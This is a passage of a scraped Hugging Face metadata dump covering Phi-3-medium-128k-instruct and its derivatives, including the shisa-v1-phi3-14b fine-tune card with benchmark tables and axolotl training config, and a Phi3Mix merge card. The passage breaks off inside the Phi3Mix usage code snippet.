""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='sample_finetune.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""allenai/WildBench"", ""eduagarcia/open_pt_llm_leaderboard"", ""allenai/ZebraLogic"", ""flowers-team/StickToYourRoleLeaderboard"", ""genai-impact/ecologits-calculator"", ""Crisp-Unimib/INVALSIbenchmark"", ""codelion/optillm"", ""Justinrune/LLaMA-Factory"", ""kenken999/fastapi_django_main_live"", ""WildEval/ZebraLogic"", ""markmagic/Phi-3-medium-128k-instruct"", ""nikunjcepatel/OpenrouterAPITest"", ""jbjbjb55/First_agent_template"", ""ReallyFloppyPenguin/SynthGen"", ""abhijitkumarjha88192/testllmgr"", ""yingzhanghhh/microsoft-Phi-3-medium-128k-instruct"", ""babah1998/Phi-3-medium-4k-instruct"", ""way2mhemanth/microsoft-Phi-3-medium-128k-instruct"", ""vuxuanhoan/anychat"", ""Mackintoshj/anychat"", ""mariamgvelesiani/anychat"", ""yalotaibii/anychat"", ""ilovemystagename/anychat"", ""RoyZheng/microsoft-Phi-3-medium-128k-instruct"", ""Mister12rayyan/RYanychat"", ""msun415/Llamole"", ""kalashshah19/SwitchAI""], ""safetensors"": {""parameters"": {""BF16"": 13960238080}, ""total"": 13960238080}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-08-20 19:58:08+00:00"", ""cardData"": ""language:\n- multilingual\nlicense: mit\nlicense_link: https://huggingface.co/microsoft/Phi-3-medium-128k-instruct/resolve/main/LICENSE\npipeline_tag: text-generation\ntags:\n- nlp\n- code\ninference:\n parameters:\n temperature: 0.7\nwidget:\n- messages:\n - role: user\n content: Can you provide ways to eat combinations of bananas and dragonfruits?"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""663a4864bdcfe1472b15580d"", ""modelId"": ""microsoft/Phi-3-medium-128k-instruct"", ""usedStorage"": 27921004451}",0,"https://huggingface.co/migtissera/Tess-v2.5-Phi-3-medium-128k-14B, https://huggingface.co/wwe180/Phi-3-medium-128k-27B-lingyang-v0.1, https://huggingface.co/wwe180/Phi-3-medium-128k-10B-lingyang-v0.1, https://huggingface.co/shisa-ai/shisa-v1-phi3-14b, https://huggingface.co/flammenai/Mahou-1.2-phi-14B, https://huggingface.co/DarqueDante/Phi3Mix, https://huggingface.co/dankalin/phi3-medium-instruct",7,"https://huggingface.co/kostasman1/results, https://huggingface.co/jak6/results_medium, https://huggingface.co/alsokit/Phi-3-medium-128K-LoRA, https://huggingface.co/KEITA21/Phi-3-medium-128k-instruct, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C1, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C2, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C3, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C4, 
https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C5, https://huggingface.co/swkong/Adapter-Phi-3-medium-128k-instruct-bnb-lora, https://huggingface.co/swkong/Adapter-Phi-3-medium-128k-instruct-lora-hrdx-gptq, https://huggingface.co/lfhe/task-7-deepseek-ai-DeepSeek-R1-Distill-Qwen-7B, https://huggingface.co/gvo1112/task-7-meta-llama-Meta-Llama-3.1-8B-Instruct, https://huggingface.co/jerseyjerry/task-7-microsoft-Phi-3-medium-128k-instruct, https://huggingface.co/flockgo/task-7-microsoft-Phi-3-mini-128k-instruct, https://huggingface.co/DreamGallery/task-7-microsoft-Phi-3-mini-128k-instruct, https://huggingface.co/robertou2/task-7-microsoft-Phi-3-medium-128k-instruct, https://huggingface.co/jenniellama/task-7-microsoft-Phi-3-medium-128k-instruct, https://huggingface.co/gvo1112/task-7-microsoft-Phi-3-medium-128k-instruct-1745363668, https://huggingface.co/linsanityuk/task-7-dailysub_202504230109, https://huggingface.co/linsanityuk/task-7-dailysub_202504230123, https://huggingface.co/linsanityuk/task-7-dailysub_202504230129, https://huggingface.co/linsanityuk/task-7-dailysub_202504230135",23,"https://huggingface.co/mradermacher/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/qwp4w3hyb/Phi-3-medium-128k-instruct-iMat-GGUF, https://huggingface.co/nisten/phi3-medium-128k-gguf, https://huggingface.co/bartowski/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/wwe180/Phi-3-medium-128k-27B-lingyang-v0.1-Q4_K_M-GGUF, https://huggingface.co/wwe180/Phi-3-medium-128k-10B-lingyang-v0.1-Q6_K-GGUF, https://huggingface.co/second-state/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/gaianet/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/qwp4w3hyb/Phi-3-medium-4k-instruct-iMat-GGUF, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-2_2bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-2_5bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-3_0bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-3_5bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-3_75bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-4_0bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-4_25bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-5_0bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-6_0bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-6_5bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-8_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-2_2bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-2_5bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-3_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-3_5bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-3_75bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-4_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-4_25bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-5_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-6_5bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-6_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-8_0bpw_exl2, https://huggingface.co/legraphista/Phi-3-medium-128k-instruct-IMat-GGUF, https://huggingface.co/AdvaitTahilyani/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/newsletter/Phi-3-medium-128k-instruct-Q6_K-GGUF, 
https://huggingface.co/bartowski/Tess-v2.5-Phi-3-medium-128k-14B-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q8_0-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q6_K-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q5_K_M-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q5_K_S-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q5_0-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q4_K_S-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q4_0-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q3_K_L-GGUF, https://huggingface.co/martintomov/Phi-3-medium-128k-instruct-Q4_K_S-GGUF, https://huggingface.co/Sc0m3r/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw5-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw5.5-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw4-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw3-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw3.5-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw4.4-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw4.8-exl2, https://huggingface.co/teemperor/Phi-3-medium-128k-instruct-Q6_K-GGUF, https://huggingface.co/RedHatAI/Phi-3-medium-128k-instruct-quantized.w8a16, https://huggingface.co/Kondara/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/andysalerno/Phi-3-medium-128k-instruct-Q8_0-GGUF, https://huggingface.co/Lambent/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/awels/maximusLLM-14b-128k-gguf, https://huggingface.co/awels/merlinLLM-14b-128k-gguf, https://huggingface.co/Dexman04/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/tayhym/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/matrixportal/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/antoste/Phi-3-medium-128k-instruct-Q5_0-GGUF, https://huggingface.co/antoste/Phi-3-medium-128k-instruct-Q4_0-GGUF, https://huggingface.co/mradermacher/Phi-3-medium-128k-instruct-i1-GGUF, https://huggingface.co/antoste/Phi-3-medium-128k-instruct-Q2_K-GGUF, https://huggingface.co/antoste/Phi-3-medium-128k-instruct-Q3_K_S-GGUF, https://huggingface.co/tensorblock/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/newsletter/Phi-3-medium-128k-instruct-Q8_0-GGUF, https://huggingface.co/itlwas/Phi-3-medium-128k-instruct-Q4_K_M-GGUF",71,,0,"Crisp-Unimib/INVALSIbenchmark, Justinrune/LLaMA-Factory, ReallyFloppyPenguin/SynthGen, WildEval/ZebraLogic, allenai/WildBench, allenai/ZebraLogic, codelion/optillm, eduagarcia/open_pt_llm_leaderboard, flowers-team/StickToYourRoleLeaderboard, genai-impact/ecologits-calculator, jbjbjb55/First_agent_template, kenken999/fastapi_django_main_live",12
|
| 275 |
+
https://huggingface.co/migtissera/Tess-v2.5-Phi-3-medium-128k-14B,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 276 |
+
https://huggingface.co/wwe180/Phi-3-medium-128k-27B-lingyang-v0.1,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 277 |
+
https://huggingface.co/wwe180/Phi-3-medium-128k-10B-lingyang-v0.1,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 278 |
+
shisa-ai/shisa-v1-phi3-14b,"---
|
| 279 |
+
license: mit
|
| 280 |
+
base_model: microsoft/Phi-3-medium-128k-instruct
|
| 281 |
+
tags:
|
| 282 |
+
- generated_from_trainer
|
| 283 |
+
model-index:
|
| 284 |
+
- name: outputs/phi3-medium-128k-14b.8e6
|
| 285 |
+
results: []
|
| 286 |
+
---
|
| 287 |
+
This test ablation probably shouldn't be used. It actually underperforms the original Phi 3 Medium Instruct model as it was trained w/ ChatML (but still performs better with the original Phi 3 instruct template). If you were to do a training run w/ this dataset, I'd recommend modifying the training to use the Phi 3 Instruct chat format.
|
| 288 |
+
|
| 289 |
+
## Performance
|
| 290 |
+
Measured using a [fork](https://github.com/shisa-ai/shaberi) of [Lightblue's Shaberi benchmark framework](https://github.com/lightblue-tech/japanese_llm_eval):
|
| 291 |
+
|
| 292 |
+
| Model | Average | ELYZA-tasks-100 | MT-Bench | Rakuda | Tengu-Bench |
|
| 293 |
+
|----------------------------------------|---------|-----------------|----------|--------|-------------|
|
| 294 |
+
| gpt-4-turbo-2024-04-09 | 8.75 | 8.78 | 8.74 | 9.18 | 8.31 |
|
| 295 |
+
| gpt-4o-2024-05-13 | 8.72 | 8.88 | 8.69 | 9.15 | 8.16 |
|
| 296 |
+
| gemini-1.5-pro | 8.58 | 8.58 | 8.93 | 9.20 | 7.61 |
|
| 297 |
+
| claude-3-opus-20240229 | 8.55 | 8.64 | 8.58 | 8.75 | 8.23 |
|
| 298 |
+
| CohereForAI/c4ai-command-r-plus | 7.69 | 7.50 | 7.43 | 9.05 | 6.79 |
|
| 299 |
+
| **shisa-ai/shisa-v1-llama3-70b** | **7.30**| **7.34** | **7.67** | **8.15** | **6.04** |
|
| 300 |
+
| gpt-3.5-turbo-0125 | 7.17 | 7.24 | 6.98 | 7.64 | 6.82 |
|
| 301 |
+
| **shisa-ai/shisa-v1-llama3-70b.2e5** | **7.17**| **7.16** | **7.45** | **7.98** | **6.09** |
|
| 302 |
+
| karakuri-ai/karakuri-lm-8x7b-chat-v0.1 | 7.00 | 7.18 | 6.30 | 7.98 | 6.55 |
|
| 303 |
+
| karakuri-ai/karakuri-lm-70b-chat-v0.1 | 6.84 | 6.86 | 6.43 | 7.85 | 6.23 |
|
| 304 |
+
| lightblue/ao-karasu-72B | 6.81 | 7.19 | 6.54 | 7.25 | 6.27 |
|
| 305 |
+
| **shisa-ai/shisa-v1-llama3-8b** | **6.59**| **6.67** | **6.95** | **7.05**| **5.68** |
|
| 306 |
+
| microsoft/Phi-3-medium-128k-instruct | 6.48 | 7.10 | 5.92 | 6.84 | 6.04 |
|
| 307 |
+
| **shisa-ai/shisa-swallowmx-13a47b-v1** | **6.17**| **6.48** | **6.07** | **7.11**| **5.03** |
|
| 308 |
+
| lightblue/suzume-llama-3-8B-japanese | 5.96 | 6.68 | 4.96 | 6.68 | 5.53 |
|
| 309 |
+
| augmxnt/shisa-gamma-7b-v1 | 5.82 | 5.96 | 5.02 | 6.85 | 5.47 |
|
| 310 |
+
| **shisa-ai/shisa-v1-phi3-14b** | **5.77**| **6.28** | **5.26** | **6.55**| **5.01** |
|
| 311 |
+
| **shisa-ai/shisa-v1-gemma-8b** | **5.64**| **6.50** | **5.42** | **5.10**| **5.55** |
|
| 312 |
+
| Rakuten/RakutenAI-7B-chat | 5.58 | 5.92 | 4.60 | 6.58 | 5.24 |
|
| 313 |
+
| lightblue/qarasu-14B-chat-plus-unleashed | 5.20 | 5.58 | 4.74 | 5.46 | 5.01 |
|
| 314 |
+
| **shisa-ai/shisa-v1-mistral0.3-7b** | **5.11**| **5.64** | **6.10** | **3.83**|**4.86** |
|
| 315 |
+
| cyberagent/calm2-7b-chat | 4.76 | 4.90 | 3.58 | 5.75 | 4.81 |
|
| 316 |
+
| mistralai/Mistral-7B-Instruct-v0.2 | 4.69 | 5.78 | 4.65 | 3.80 | 4.53 |
|
| 317 |
+
| **shisa-ai/shisa-v1-yi1.5-9b** | **4.63**| **5.98** | **4.28** | **3.26**|**5.00** |
|
| 318 |
+
| augmxnt/shisa-7b-v1 | 4.50 | 4.63 | 3.95 | 4.89 | 4.53 |
|
| 319 |
+
|
| 320 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 321 |
+
|
| 322 |
+
|
| 323 |
+
[<img src=""https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png"" alt=""Built with Axolotl"" width=""200"" height=""32""/>](https://github.com/OpenAccess-AI-Collective/axolotl)
|
| 324 |
+
<details><summary>See axolotl config</summary>
|
| 325 |
+
|
| 326 |
+
axolotl version: `0.4.0`
|
| 327 |
+
```yaml
|
| 328 |
+
base_model: microsoft/Phi-3-medium-128k-instruct
|
| 329 |
+
model_type: AutoModelForCausalLM
|
| 330 |
+
tokenizer_type: AutoTokenizer
|
| 331 |
+
trust_remote_code: true
|
| 332 |
+
|
| 333 |
+
load_in_8bit: false
|
| 334 |
+
load_in_4bit: false
|
| 335 |
+
strict: false
|
| 336 |
+
|
| 337 |
+
use_wandb: true
|
| 338 |
+
wandb_project: shisa-v2
|
| 339 |
+
wandb_entity: augmxnt
|
| 340 |
+
wandb_name: shisa-llama3-70b-v1.8e6
|
| 341 |
+
|
| 342 |
+
chat_template: chatml
|
| 343 |
+
datasets:
|
| 344 |
+
- path: augmxnt/ultra-orca-boros-en-ja-v1
|
| 345 |
+
type: sharegpt
|
| 346 |
+
dataset_prepared_path: last_run_prepared
|
| 347 |
+
val_set_size: 0.05
|
| 348 |
+
output_dir: ./outputs/phi3-medium-128k-14b.8e6
|
| 349 |
+
|
| 350 |
+
sequence_len: 4096
|
| 351 |
+
sample_packing: true
|
| 352 |
+
pad_to_sequence_len: true
|
| 353 |
+
neftune_noise_alpha: 5
|
| 354 |
+
|
| 355 |
+
gradient_accumulation_steps: 4
|
| 356 |
+
micro_batch_size: 2
|
| 357 |
+
num_epochs: 3
|
| 358 |
+
optimizer: paged_adamw_8bit
|
| 359 |
+
adam_beta2: 0.95
|
| 360 |
+
adam_epsilon: 0.00001
|
| 361 |
+
max_grad_norm: 1.0
|
| 362 |
+
lr_scheduler: linear
|
| 363 |
+
learning_rate: 0.000008
|
| 364 |
+
|
| 365 |
+
train_on_inputs: false
|
| 366 |
+
group_by_length: false
|
| 367 |
+
bf16: auto
|
| 368 |
+
fp16:
|
| 369 |
+
tf32: true
|
| 370 |
+
|
| 371 |
+
gradient_checkpointing: true
|
| 372 |
+
gradient_checkpointing_kwargs:
|
| 373 |
+
use_reentrant: True
|
| 374 |
+
early_stopping_patience:
|
| 375 |
+
resume_from_checkpoint:
|
| 376 |
+
local_rank:
|
| 377 |
+
logging_steps: 1
|
| 378 |
+
xformers_attention:
|
| 379 |
+
flash_attention: true
|
| 380 |
+
|
| 381 |
+
warmup_steps: 100
|
| 382 |
+
evals_per_epoch: 4
|
| 383 |
+
saves_per_epoch: 1
|
| 384 |
+
debug:
|
| 385 |
+
deepspeed: axolotl/deepspeed_configs/zero3_bf16.json
|
| 386 |
+
weight_decay: 0.1
|
| 387 |
+
fsdp:
|
| 388 |
+
fsdp_config:
|
| 389 |
+
resize_token_embeddings_to_32x: true
|
| 390 |
+
special_tokens:
|
| 391 |
+
pad_token: ""<|endoftext|>""
|
| 392 |
+
|
| 393 |
+
```
|
| 394 |
+
|
| 395 |
+
</details><br>
|
| 396 |
+
|
| 397 |
+
# outputs/phi3-medium-128k-14b.8e6
|
| 398 |
+
|
| 399 |
+
This model is a fine-tuned version of [microsoft/Phi-3-medium-128k-instruct](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct) on the augmxnt/ultra-orca-boros-en-ja-v1 dataset (see the axolotl config above).
|
| 400 |
+
It achieves the following results on the evaluation set:
|
| 401 |
+
- Loss: 0.3339
|
| 402 |
+
|
| 403 |
+
## Model description
|
| 404 |
+
|
| 405 |
+
More information needed
|
| 406 |
+
|
| 407 |
+
## Intended uses & limitations
|
| 408 |
+
|
| 409 |
+
More information needed
|
| 410 |
+
|
| 411 |
+
## Training and evaluation data
|
| 412 |
+
|
| 413 |
+
More information needed
|
| 414 |
+
|
| 415 |
+
## Training procedure
|
| 416 |
+
|
| 417 |
+
### Training hyperparameters
|
| 418 |
+
|
| 419 |
+
The following hyperparameters were used during training:
|
| 420 |
+
- learning_rate: 8e-06
|
| 421 |
+
- train_batch_size: 2
|
| 422 |
+
- eval_batch_size: 2
|
| 423 |
+
- seed: 42
|
| 424 |
+
- distributed_type: multi-GPU
|
| 425 |
+
- num_devices: 8
|
| 426 |
+
- gradient_accumulation_steps: 4
|
| 427 |
+
- total_train_batch_size: 64
|
| 428 |
+
- total_eval_batch_size: 16
|
| 429 |
+
- optimizer: Adam with betas=(0.9,0.95) and epsilon=1e-05
|
| 430 |
+
- lr_scheduler_type: linear
|
| 431 |
+
- lr_scheduler_warmup_steps: 100
|
| 432 |
+
- num_epochs: 3
|
| 433 |
+
|
| 434 |
+
### Training results
|
| 435 |
+
|
| 436 |
+
| Training Loss | Epoch | Step | Validation Loss |
|
| 437 |
+
|:-------------:|:------:|:----:|:---------------:|
|
| 438 |
+
| 2.8309 | 0.0021 | 1 | 2.3406 |
|
| 439 |
+
| 0.7688 | 0.2513 | 121 | 0.4958 |
|
| 440 |
+
| 0.6435 | 0.5026 | 242 | 0.3830 |
|
| 441 |
+
| 0.5286 | 0.7539 | 363 | 0.3626 |
|
| 442 |
+
| 0.5559 | 1.0052 | 484 | 0.3549 |
|
| 443 |
+
| 0.4651 | 1.2425 | 605 | 0.3486 |
|
| 444 |
+
| 0.5294 | 1.4938 | 726 | 0.3432 |
|
| 445 |
+
| 0.5453 | 1.7451 | 847 | 0.3392 |
|
| 446 |
+
| 0.5258 | 1.9964 | 968 | 0.3376 |
|
| 447 |
+
| 0.4805 | 2.2331 | 1089 | 0.3357 |
|
| 448 |
+
| 0.4552 | 2.4844 | 1210 | 0.3352 |
|
| 449 |
+
| 0.5358 | 2.7357 | 1331 | 0.3339 |
|
| 450 |
+
|
| 451 |
+
|
| 452 |
+
### Framework versions
|
| 453 |
+
|
| 454 |
+
- Transformers 4.40.2
|
| 455 |
+
- Pytorch 2.3.0+cu121
|
| 456 |
+
- Datasets 2.19.1
|
| 457 |
+
- Tokenizers 0.19.1
|
| 458 |
+
","{""id"": ""shisa-ai/shisa-v1-phi3-14b"", ""author"": ""shisa-ai"", ""sha"": ""3b47a24cc0893bde9636392a5c1db4f78ac7a478"", ""last_modified"": ""2024-05-25 19:12:52+00:00"", ""created_at"": ""2024-05-23 01:20:28+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 2, ""downloads_all_time"": null, ""likes"": 2, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""phi3"", ""text-generation"", ""generated_from_trainer"", ""conversational"", ""custom_code"", ""base_model:microsoft/Phi-3-medium-128k-instruct"", ""base_model:finetune:microsoft/Phi-3-medium-128k-instruct"", ""license:mit"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: microsoft/Phi-3-medium-128k-instruct\nlicense: mit\ntags:\n- generated_from_trainer\nmodel-index:\n- name: outputs/phi3-medium-128k-14b.8e6\n results: []"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": [{""name"": ""outputs/phi3-medium-128k-14b.8e6"", ""results"": []}], ""config"": {""architectures"": [""Phi3ForCausalLM""], ""auto_map"": {""AutoConfig"": ""microsoft/Phi-3-medium-128k-instruct--configuration_phi3.Phi3Config"", ""AutoModelForCausalLM"": ""microsoft/Phi-3-medium-128k-instruct--modeling_phi3.Phi3ForCausalLM""}, ""model_type"": ""phi3"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{% for message in messages %}{% if (message['role'] == 'user') %}{{'<|user|>' + '\n' + message['content'] + '<|end|>' + '\n' + '<|assistant|>' + '\n'}}{% elif (message['role'] == 'assistant') %}{{message['content'] + '<|end|>' + '\n'}}{% endif %}{% endfor %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 13960238080}, ""total"": 13960238080}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-05-25 19:12:52+00:00"", ""cardData"": ""base_model: microsoft/Phi-3-medium-128k-instruct\nlicense: mit\ntags:\n- generated_from_trainer\nmodel-index:\n- name: outputs/phi3-medium-128k-14b.8e6\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""664e99dc54518864d0827e5f"", ""modelId"": ""shisa-ai/shisa-v1-phi3-14b"", ""usedStorage"": 27921004451}",1,,0,,0,https://huggingface.co/mradermacher/shisa-v1-phi3-14b-GGUF,1,,0,huggingface/InferenceSupport/discussions/new?title=shisa-ai/shisa-v1-phi3-14b&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bshisa-ai%2Fshisa-v1-phi3-14b%5D(%2Fshisa-ai%2Fshisa-v1-phi3-14b)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 459 |
+
https://huggingface.co/flammenai/Mahou-1.2-phi-14B,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 460 |
+
DarqueDante/Phi3Mix,"---
|
| 461 |
+
license: apache-2.0
|
| 462 |
+
tags:
|
| 463 |
+
- moe
|
| 464 |
+
- merge
|
| 465 |
+
- mergekit
|
| 466 |
+
- lazymergekit
|
| 467 |
+
- phi3_mergekit
|
| 468 |
+
- microsoft/Phi-3-medium-128k-instruct
|
| 469 |
+
base_model:
|
| 470 |
+
- microsoft/Phi-3-medium-128k-instruct
|
| 471 |
+
- microsoft/Phi-3-medium-128k-instruct
|
| 472 |
+
---
|
| 473 |
+
|
| 474 |
+
# Phi3Mix
|
| 475 |
+
|
| 476 |
+
Phi3Mix is a Mixture of Experts (MoE) made with the following models using [Phi3_LazyMergekit](https://colab.research.google.com/drive/1Upb8JOAS3-K-iemblew34p9h1H6wtCeU?usp=sharing):
|
| 477 |
+
* [microsoft/Phi-3-medium-128k-instruct](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct)
|
| 478 |
+
* [microsoft/Phi-3-medium-128k-instruct](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct)
|
| 479 |
+
|
| 480 |
+
|
| 481 |
+
## 🧩 Configuration
|
| 482 |
+
|
| 483 |
+
```yaml
|
| 484 |
+
base_model: microsoft/Phi-3-medium-128k-instruct
|
| 485 |
+
gate_mode: cheap_embed
|
| 486 |
+
experts_per_token: 1
|
| 487 |
+
dtype: float16
|
| 488 |
+
experts:
|
| 489 |
+
- source_model: microsoft/Phi-3-medium-128k-instruct
|
| 490 |
+
positive_prompts: [""research, logic, math, science""]
|
| 491 |
+
- source_model: microsoft/Phi-3-medium-128k-instruct
|
| 492 |
+
positive_prompts: [""creative, art""]
|
| 493 |
+
```
|
| 494 |
+
|
| 495 |
+
## 💻 Usage
|
| 496 |
+
|
| 497 |
+
```python
|
| 498 |
+
import torch
|
| 499 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 500 |
+
|
| 501 |
+
model = ""DarqueDante/Phi3Mix""
|
| 502 |
+
|
| 503 |
+
tokenizer = AutoTokenizer.from_pretrained(model_id)
|
| 504 |
+
|
| 505 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 506 |
+
model_id,
|
| 507 |
+
trust_remote_code=True,
|
| 508 |
+
)
|
| 509 |
+
|
| 510 |
+
prompt=""How many continents are there?""
|
| 511 |
+
input = f""<|system|>You are a helpful AI assistant.<|end|><|user|>{prompt}<|assistant|>""
|
| 512 |
+
tokenized_input = tokenizer.encode(prompt_text, return_tensors=""pt"")
|
